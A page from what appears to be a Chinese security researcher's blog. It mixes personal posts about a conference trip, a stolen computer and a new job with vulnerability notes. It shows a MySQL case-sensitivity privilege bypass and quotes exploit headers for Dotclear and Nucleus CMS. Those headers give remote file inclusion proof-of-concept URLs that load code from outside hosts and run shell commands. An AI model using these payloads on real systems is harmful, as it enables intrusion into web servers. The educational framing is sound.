5up3rh3i'blog［提供有偿web代码安全审计服务］

https://buildsecurityin.us-cert.gov/daisy/bsi/home.html

本来想用这个文档来骗xcon2006门票的......

http://superhei.blogbus.com/files/1157120596.ppt

感谢：
1.感谢村长和剑心 linzi maple-x xy7 李丰初 cjf到机场去接我
2.感谢村长 dm bk kq ic 寒冰 肉肉 sowaht sh0cker sobeit dn 村雨 Jambalaya keji cjf 紫鱼....很多很多牛牛及家属的款待和照顾
3.特别感谢村长 和bk 第一次出门很多事情都没仔细考虑，谢谢你们的包含和照顾。
4.感谢casper提供很多的特权服务
5.感谢mix harry 諾諾及家属 最后的款待
......

收获：
1.认识了很多朋友，牛牛，酒神。学到了很多平时学不到的生活上的知识。
2.得到一个“饭神”和“酒神“的称号。
3.物理接触了很多仰慕以久的牛人。
4.得到很多8挂内部消息。
......

感触：
1.北京人多车多，就是美女不多。
2.”一进一出“的问题比较难以适应。
3.北京酒神多，”西南酒神“老是状态不佳。
4.我要努力学习英语。
5.故宫除了大，就没什么其他东西玩的。
6.没有见到swan（不是牛）有点遗憾，听他们说我们长得2个有点像？
......

http://secunia.com/advisories/21506/print/发布了mysql的2个新漏洞

1.http://bugs.mysql.com/bug.php?id=17647
测试：
$ mysql -h my.mysql.server -u sample -p -A sample
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 263935 to server version: 4.1.16-standard

mysql> create database another;
ERROR 1044: Access denied for user 'sample'@'%' to database 'another'

mysql> create database sAmple; 
Query OK, 1 row affected (0.00 sec)

利用了unix的区别大小写的这个特性，所以在win下是没有的 :)

2.http://bugs.mysql.com/bug.php?id=18630
权限提升，这个好象就是《Hackfing in Mysql5》里提到的
“b、跨权限
存储过程是继承创建者的权限的，如果存储过程是root创建的，当其他普通用户使用这个存储过程时，导致跨权限攻击”

http://www.xfocus.net/articles/200601/847.html

小偷从窗子爬进我的房间,唯一值点钱的家具电脑被偷了..... 可惜了那些资料和文档......

毕业照片等等都在上面了. 郁闷ing...

http://msdn.microsoft.com/msdnmag/issues/04/09/SQLInjection/

http://www.net-security.org/software.php?id=633

http://shiflett.org/archive/184

http://www.cipher.org.uk/index.php?p=projects/bugle.project

https://www.0x557.cn/

记得好多人打听557bbs的地址.......

明天去单位报道，要上班了。单位安排的地方估计没有拉宽带，有事情的朋友可以电话联系，或者给我留言。

前言：
     openrowset/opendatasource的应用大家应该很熟悉了，cadt[1]就是利用的openrowset，其实我们利用openrowset/opendatasource还可

以做很多事情。

http://www.hardened-php.net/advisory_042006.119.html

http://marc.theaimsgroup.com/?l=bugtraq&m=115012948406587&w=2

http://www.securityfocus.com/infocus/1864

从人家的exp里可以学到点什么

1.http://retrogod.altervista.org/dotclear_124_php5_xpl.html

/*
  software site: http://www.dotclear.net/

  vulnerable code in layout/prepend.php near lines 78-104:

...
# Variable de conf
$theme_path = $blog_dc_path.'/themes/';
$theme_uri = dc_app_url.'/themes/';
$img_path = dc_img_url;

# Définition du thème et de la langue
$__theme = dc_theme;
$__lang = dc_default_lang;

# Ajout des functions.php des plugins
$objPlugins = new plugins(dirname(__FILE__).'/../'.DC_ECRIRE.'/tools/');
foreach ($objPlugins->getFunctions() as $pfunc) {
 require_once $pfunc;
}

# Définition du template
if (!is_dir($theme_path.$__theme)) {
 header('Content-type: text/plain');
 echo 'Le thème '.$__theme.' n\'existe pas';
 exit;
}

if (file_exists($theme_path.$__theme.'/template.php')) {
 $dc_template_file = $theme_path.$__theme.'/template.php';
} else {
 $dc_template_file = $theme_path.'default/template.php';
}
echo $dc_template_file;
# Prepend du template s'il existe
if (file_exists(dirname($dc_template_file).'/prepend.php')) {
 require dirname($dc_template_file).'/prepend.php';
}
...

$blog_dc_path var is not sanitized before to be used to include files,
on PHP5, because is_dir() and file_exists() funcs support ftp wrappers,
you can include an arbitrary prepend.php file in a themes/default/ folder
from a remote resource, poc:

http://[target]/[path_to_dotclear]/layout/prepend.php?blog_dc_path=ftp://username:password@somesite.com&cmd=ls%20-la
*/

2.http://retrogod.altervista.org/nucleus_322_incl_xpl.html

/* software site: http://nucleuscms.org/

   i) vulnerable code in nucleus/libs/PLUGINADMIN.php at lines 21-49:

   ...
   global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES, $HTTP_SESSION_VARS;
$aVarsToCheck = array('DIR_LIBS');
foreach ($aVarsToCheck as $varName)
{
 if (phpversion() >= '4.1.0')
 {
  if (   isset($_GET[$varName])
   || isset($_POST[$varName])
   || isset($_COOKIE[$varName])
   || isset($_ENV[$varName])
   || isset($_SESSION[$varName])
   || isset($_FILES[$varName])
  ){
   die('Sorry. An error occurred.');
  }
 } else {
  if (   isset($HTTP_GET_VARS[$varName])
   || isset($HTTP_POST_VARS[$varName])
   || isset($HTTP_COOKIE_VARS[$varName])
   || isset($HTTP_ENV_VARS[$varName])
   || isset($HTTP_SESSION_VARS[$varName])
   || isset($HTTP_POST_FILES[$varName])
  ){
   die('Sorry. An error occurred.');
  }
 }
}

include($DIR_LIBS . 'ADMIN.php');
...

so, if register_globals = On and allow_url_fopen = On, we have arbitrary remote inclusion, poc:

http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://somehost.com/&cmd=ls%20-la

where on somehost.com we have some php code in

http://somehost.com/ADMIN.php/index.html

also, if register_globals = On & magic_quotes_gpc = Off:

http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/var/log/httpd/access_log%00&cmd=ls%20-la

 */